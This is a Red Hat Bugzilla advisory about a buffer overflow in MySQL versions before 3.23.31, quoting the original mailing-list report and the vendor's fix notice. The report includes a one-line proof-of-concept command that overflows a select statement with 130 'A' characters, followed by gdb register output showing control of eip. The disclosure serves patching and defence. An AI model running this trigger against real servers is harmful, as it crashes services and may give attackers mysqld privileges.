Red Hat Bugzilla – Bug 24381
Buffer Overflow in MySQL <3.23.31
Last modified: 2007-04-18 12:30:47 EDT
Nicolas Gregoire post in BugTraq:
all versions of MySQL < 3.23.31 have a buffer-overflow which crashs the
server and which seems to be exploitable (ie. 4141414 in eip)
An attacker could gain mysqld privileges (gaining access to all the
You need a valid login/password to exploit this
Upgrade to 3.23.31
Proof-of-concept code :
I'm not the discoverer of this bug
The first public report was made by email@example.com via the MySQL
See the following mails for details
Here the original post to the MySQL mailing-list :
On Jan 12, Jo?o Gouveia wrote:
> I believe i've found a problem in MySql. Here are some test's i've made
> 3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't
> debug it, just tested to see if crashes ).Confirmed up to latest 3.23
> On one terminal:
> spike:/var/mysql # /sbin/init.d/mysql start
> Starting service MySQL.
> Starting mysqld daemon with databases from /var/mysql
> spike:/var/mysql #
> On the other terminal:
> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
> Enter password:
> On the first terminal i got:
> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation
> $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR
> g "$@" >>$err_log 2>&1>
> Number of processes running now: 0
> mysqld restarted on Fri Jan 12 07:10:54 WET 2001
> mysqld daemon ended
> gdb shows the following:
> (gdb) run
> Starting program: /usr/sbin/mysqld
> [New Thread 16897 (manager thread)]
> [New Thread 16891 (initial thread)]
> [New Thread 16898]
> /usr/sbin/mysqld: ready for connections
> [New Thread 16916]
> [Switching to Thread 16916]
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) info all-registers
> eax 0x1 1
> ecx 0x68 104
> edx 0x8166947 135686471
> ebx 0x41414141 1094795585
> esp 0xbf5ff408 0xbf5ff408
> ebp 0x41414141 0x41414141
> esi 0x41414141 1094795585
> edi 0x0 0
> eip 0x41414141 0x41414141
> eflags 0x10246 66118
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0 0
> gs 0x0 0
> looks like a tipical overflow to me.
> Please reply asap, at least to tell me i'me not seeing things. :-)>
> Best regards,
> Joao Gouveia aka Tharbad.
Here the reponse to a email I send today to the MySQL list :
Sergei Golubchik (MySQL team) wrote :
> On Jan 18, Nicolas GREGOIRE wrote:
> > Hi,
> > Still not any info about the buffer-overflow discovered last week ?
> > Shouldn't be fixed at the beginning of the week ?
> > Please, dear MySQL team, give us info !!
> > Regards,
> > Nicob
> Fixed in latest release (3.23.31).
Here an part of the 3.23.30 to 3.23.31 diff :
+Changes in release 3.23.31
+ * Fixed security bug in something (please upgrade if you are using a
+ earlier MySQL 3.23 version).
We are aware of the problem, and a package was handed over to QA for testing
New problems came along, but 3.23.32-1.7 is ready to go and will be released soon.